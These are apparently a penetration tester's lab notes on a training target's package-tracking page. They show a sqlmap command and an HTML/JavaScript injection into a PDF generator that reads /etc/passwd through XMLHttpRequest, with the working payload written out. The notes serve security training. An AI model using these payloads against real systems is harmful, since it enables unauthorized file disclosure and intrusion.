## `tracking.inlanefreight.local`
- only functionality looks like entry of a tracking number ![[images/Pasted image 20260628161924.png]]
- random entry: `dfsdfsdfds` entered as part of a POST request and returned a PDF![[images/Pasted image 20260628195223.png]]
- `request:response` in burp ![[images/Pasted image 20260628195303.png]]
### SQLi
- try `sqlmap` on `insert` parameter ![[images/Pasted image 20260628201022.png]]
- try again without an injection point
```bash
sqlmap -r tracking.req --batch --level=5 --risk=3
```
- possible SQLi on `handle` parameter ![[images/Pasted image 20260628212043.png]]
- mark injection point and limit to boolean based blind
- super slow
### fuzzing
- directory ![[images/Pasted image 20260630171736.png]]
- page![[images/Pasted image 20260630171857.png]]
### testing
- whatever i enter in tracking field shows up in the PDF output like `test` ![[images/Pasted image 20260630171057.png]]
- if i try `test"<script>alert(window.origin)</script>` the script portion is cut off ![[images/Pasted image 20260630171848.png]]
- if i try `test"<plaintext>` i get an interesting output ![[images/Pasted image 20260630172010.png]]
- it must be executing the javascript
- Google: "pdf injection file read"
- try this payload for XHR/javascript execution in DOM > not getting what I expected
```javascript
<script>
xhr = new XMLHttpRequest();
xhr.onload = function() {
// Send responseText to attacker-controlled server
};
xhr.open("GET", "file:///etc/passwd");
xhr.send();
</script>
```
![[images/Pasted image 20260630185144.png]]
- try a modified payload > the above has a blank placeholder
```javascript
<script>
var xhr = new XMLHttpRequest();
xhr.onload = function() {
document.write(this.responseText);
};
xhr.open("GET", "file:///etc/passwd", false);
xhr.send();
</script>
```
- there we go ![[images/Pasted image 20260630192013.png]]